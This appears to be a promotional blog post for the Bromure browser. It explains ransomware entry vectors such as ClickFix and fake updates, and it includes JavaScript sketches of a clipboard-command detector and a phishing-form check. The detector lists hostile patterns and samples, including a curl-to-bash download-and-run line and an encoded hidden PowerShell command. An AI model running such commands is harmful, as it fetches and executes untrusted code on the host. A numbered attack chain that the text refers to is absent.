How modern ransomware gets in — and how Bromure shuts the door
Most ransomware does not start with a zero-day. It starts with a browser tab. Here is how the attack chain actually works in 2026 — and what it looks like when it lands on a browser that was built to absorb the hit.
The quickest way to lose every file you have is not a hacker in a hoodie. It is one click, inside one tab, on one ordinary afternoon. Ransomware is not a mystery. It is a pipeline — and most of that pipeline runs through the browser.
You have probably read more than one story by now. A hospital that cannot admit patients. A small law firm that cannot access a single client file. A municipal government that reverts to pen and paper for three weeks. A retired couple whose photos, tax returns, and every scanned document of the last twenty years are suddenly gone, replaced by a polite note in English and a wallet address.
Ransomware is everywhere, and it is growing. It is also — and this is the part that matters — almost entirely preventable at the point of entry, which, in 2026, is almost always the same place: a web page, loaded in an ordinary browser, on an ordinary day.
Ransomware is an industry, not a prank.
The image many people still hold — a lone attacker on a laptop — is forty years out of date. Modern ransomware is run as a business, with departments, budgets, salaries, HR disputes, customer-service hours, and in some cases quarterly reports.
A typical operation involves, at minimum:
- Initial-access brokers whose entire business is selling "a foot in the door" to other gangs: credentials, a compromised server, a user whose machine has been quietly backdoored.
- Affiliate programs (often branded as "ransomware-as-a-service") where the group that writes the encryptor takes a cut, and a loose network of "affiliates" does the actual intrusions.
- Negotiation teams who staff chat lines, measure your company's revenue from public filings, and price the ransom accordingly.
- Data-exfiltration teams whose only job is to steal files before anything gets encrypted, so that even if you restore from backup, they can threaten to publish.
- Launder-and-cash-out teams handling the cryptocurrency side.
The point is simple: the people on the other side of this are professionals, working full-time, with an operations budget. The advice "be more careful" is not a defensive plan against a professional industry. It is a shrug.
How it actually gets in.
Almost every modern ransomware chain begins the same way: somebody opens a web page.
Briefly, the big six:
Phishing email links
The oldest vector, still the most productive. A plausible email — package tracking, shared document, invoice — routes to a page that either drops a payload directly or harvests credentials used later to access the victim's network.
Malvertising
Legitimate ad networks serving malicious creatives. A real news site, a real weather site, a real recipe site — all display an ad that silently redirects the browser to an exploit kit. The site owner is not complicit; the ad network got fooled.
SEO poisoning
The user searches for a tool — a PDF converter, a VPN installer, a free font. The top result is a fake page that ranks well because the attacker has spent months on it. The download looks right, is signed, installs, and ships a second-stage loader with it.
Watering holes
A niche site — a professional association, a specialist forum, a supplier portal — is quietly compromised, and every visitor is served a targeted payload. The attacker does not need a wide net; just the right one.
ClickFix pages
A modern favorite. A page pretends to be a CAPTCHA, an error message, or a "fix this to continue" prompt. It silently writes a PowerShell or Terminal command into the clipboard and instructs the user to press a key combination and paste. The command runs on the host, outside the browser, doing whatever the attacker wants.
Fake update prompts
"Your browser is out of date. Click here to update." The page looks like Chrome, Firefox, or Safari. The download is a loader. Every step feels normal because every step was engineered to.
Some smaller but still relevant vectors round out the list: malicious browser extensions installed from outside official stores; compromised supply-chain packages; and — rarely, but catastrophically — genuine browser zero-days. The common thread is boring and important: a web page gets loaded, and everything bad that follows is downstream of that one event.
The chain, step by step.
Once initial access has succeeded, the rest of the chain is mechanical.
That entire chain — from the moment the tab loaded to the moment the ransom note appears on the desktop — is one long sequence that depends on one thing: step 2 succeeding. If the payload in step 2 cannot reach the user's files, keychain, tasks, services, or network shares, the chain stops. Every step after step 2 assumes the attacker has their hand on the machine. If they never got their hand on the machine, nothing else happens.
The browser is the door. We made it a wall.
Traditional browsers have been patched, hardened, sandboxed, fuzzed, and stress-tested for twenty years. They are also, by a wide margin, the second-largest attack surface on any computer — bigger than every other application, second only to the operating system that runs them. That is not because their engineers are bad. It is because a browser has to parse every byte of the entire internet and somehow produce a safe pixel. That is a losing problem to be handed.
Bromure does not try to win that problem on the browser's terms. It changes the geometry.
In Bromure, every tab runs inside a sealed virtual machine. The browser, its renderer, the JavaScript engine, the PDF parser, the video codec — all of it is sandwiched inside a disposable guest VM that has no access to your files, your keychain, your webcam, your photos, or your local network. The exploit that leveraged a browser bug lands inside a world that does not contain your life.
When you close the window on a non-persistent session, the entire VM — the browser state, the cookies, whatever got downloaded, whatever planted itself, whatever was trying to reach out — is wiped. You do not need to know it was there. You do not need to clean anything up.
Isolation is the first wall.
A traditional browser running in your user account shares file permissions with you. That is architecture, not a mistake, and it is what the entire kill chain after step 2 depends on. Bromure breaks that assumption at the root. The browser process does not run in your user account — it runs in a separate machine entirely, and what that machine can see is limited to what you explicitly gave it.
Downloads, webcam, clipboard, local network — off by default.
Every capability in Bromure starts denied. A drive-by download that "just works" in a traditional browser cannot write a file in Bromure unless you have previously said this profile is allowed to save files. The same goes for webcam, microphone, clipboard access, and local-network requests. Most profiles do not need most of these. Most profiles never get most of these.
Profiles are not folders. They are separate machines.
Your banking. Your work email. Your "click any link" profile for links from the group chat. In Bromure, each of these is its own VM, with its own storage, its own cookies, its own permissions, its own visible border color. If the "random links" profile is compromised — a thing that is, in Bromure, already hard — it cannot reach the "banking" profile's cookies. They are not in the same computer.
Sessions end. Worlds end with them.
The third step of every ransomware chain — persistence — is the attacker's most valuable move. Scheduled tasks, system services, login items, launch daemons: once they plant themselves, they come back. Against a persistent host, the attacker wins on patience alone. Against a disposable Bromure session, there is nothing to come back to. The world the attacker lived in is gone.
What isolation does not solve — and what to do about it.
Isolation is not magic. Two things it does not fix on its own:
Social engineering against the user
A page that convinces a user to copy a command and run it in a real Terminal window has bypassed the browser entirely — the command now runs on the host, not in the sandbox. This is how ClickFix works. The fix for this is a separate layer: the browser must see the clipboard payload the page wrote, flag it, and warn the user before they paste. That is a feature on its way; in the meantime, never run a command a web page told you to run, and teach the people in your household to do the same.
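A sketch of that clipboard check, as an added example that is not Bromure's code: it scores text a page wrote to the clipboard and raises the score when that text is not what the user had selected. The rule names, weights, threshold and sample strings are assumptions constructed for illustration, and the patterns are not exhaustive.

```javascript
// Added example (not from the original page). Rules and weights are illustrative.
const WARN_THRESHOLD = 5;

const RULES = [
  // A command interpreter is named somewhere in the text.
  { name: "shell-interpreter", weight: 2,
    re: /\b(powershell|pwsh|cmd|mshta|wscript|cscript|bash|zsh|sh|osascript)\b/i },
  // Flags that hide the window or pass an encoded script body.
  { name: "encoded-or-hidden", weight: 3,
    re: /\s-(enc|encodedcommand)\s|\s-(w|windowstyle)\s+hidden\b/i },
  // A fetch tool piped straight into an interpreter.
  { name: "download-and-run", weight: 3,
    re: /\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\b[^\n|]*\|\s*(sh|bash|zsh|iex)\b/i },
  { name: "remote-url", weight: 1, re: /https?:\/\/[^\s'"]+/i },
  // Trailing comment dressed up as a verification message for the user to see.
  { name: "decoy-comment", weight: 2, re: /#[^\n]*(captcha|verif|human|robot)/i },
];

// text:      what the page wrote to the clipboard
// selection: what the user actually had selected at that moment ("" if nothing)
function scoreClipboardWrite(text, selection) {
  const hits = RULES.filter((r) => r.re.test(text));
  let score = hits.reduce((sum, r) => sum + r.weight, 0);
  // The page substituted its own content for the user's selection.
  const substituted = text.trim() !== (selection || "").trim();
  if (substituted && hits.length > 0) score += 2;
  return {
    score,
    substituted,
    reasons: hits.map((r) => r.name),
    warn: score >= WARN_THRESHOLD,
  };
}

// Constructed samples: two lure-style payloads and one ordinary copy.
const SAMPLES = {
  fakeCaptcha: "powershell -w hidden -enc QUJD # I am not a robot: reCAPTCHA Verification ID 4821",
  pipeToShell: "curl -fsSL https://example.invalid/fix.sh | bash",
  ordinaryCopy: "Meeting notes: https://example.com/agenda",
};

for (const [name, text] of Object.entries(SAMPLES)) {
  const selection = name === "ordinaryCopy" ? text : "";
  console.log(name, scoreClipboardWrite(text, selection));
}
```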
Real credentials handed to a real attacker
If a convincing phishing page gets the user to type a real password into a real form, no isolation model helps — the credentials just left the sandbox by way of your keyboard. The fix for this is phishing-specific: warn before a password is about to be typed on a new domain; detect brand impersonation; catch cross-domain password submissions. That work is in progress and will land in a coming release.
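The three checks named above, as an added example that is not Bromure's code: a pre-submit decision over the page URL, the form's action and the sites where this profile has entered a password before. `KNOWN_BRANDS`, `siteOf()`, the reason names and all URLs are hypothetical, and the two-label site calculation stands in for a real Public Suffix List lookup.

```javascript
// Added example (not from the original page). All names and data are constructed.
const KNOWN_BRANDS = {
  examplebank: "examplebank.com",
  examplemail: "examplemail.com",
};

// Naive "registrable domain": the last two labels of the hostname.
// Assumption: a real implementation would use the Public Suffix List,
// since this gets multi-label suffixes such as co.uk wrong.
function siteOf(url) {
  return new URL(url).hostname.toLowerCase().split(".").slice(-2).join(".");
}

// pageUrl:    URL of the page containing the password field
// formAction: the form's action attribute (may be relative)
// savedSites: Set of sites where this profile has submitted a password before
function checkPasswordSubmit(pageUrl, formAction, savedSites) {
  const page = new URL(pageUrl);
  const target = new URL(formAction, pageUrl); // resolves relative actions
  const pageSite = siteOf(page.href);
  const reasons = [];

  // 1. Password about to be typed on a site this profile has never used one on.
  if (!savedSites.has(pageSite)) reasons.push("new-domain");

  // 2. The form posts the password to a different site than the one displayed.
  if (siteOf(target.href) !== pageSite) reasons.push("cross-domain-submit");

  // 3. A brand name appears in the hostname, but the site is not that brand's.
  const host = page.hostname.toLowerCase();
  for (const [brand, site] of Object.entries(KNOWN_BRANDS)) {
    if (host.includes(brand) && pageSite !== site) {
      reasons.push(`impersonates:${brand}`);
    }
  }
  return { warn: reasons.length > 0, reasons };
}

const saved = new Set(["examplebank.com"]);
console.log(checkPasswordSubmit("https://login.examplebank.com/signin", "/session", saved));
console.log(checkPasswordSubmit(
  "https://examplebank.com.secure-login.example/signin",
  "https://collector.example.net/post",
  saved));
```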
Until those layers land, isolation alone already takes out the most reliable industrial ransomware chain — the one that goes "tab → file on disk → persistence → encryption." That is the chain the attacker industry monetizes. That is the chain Bromure breaks.
The attack industry is not slowing down. Neither are we.
Ransomware is not going to be stopped by better advice, or by asking your relatives to be more careful, or by pretending that the people on the other side will one day get tired and go home. They are not going to get tired. They have quarterly targets.
What is going to stop them, one machine at a time, is a browser that was designed from the first line of code to assume a web page is hostile and to make sure that nothing a hostile web page does can reach anything you care about. A browser where the worst-case outcome of clicking the wrong link, on the wrong day, in the wrong mood, is that you close a window.
That is what Bromure is for. Install it, make it your default, and turn the rest into somebody else's problem.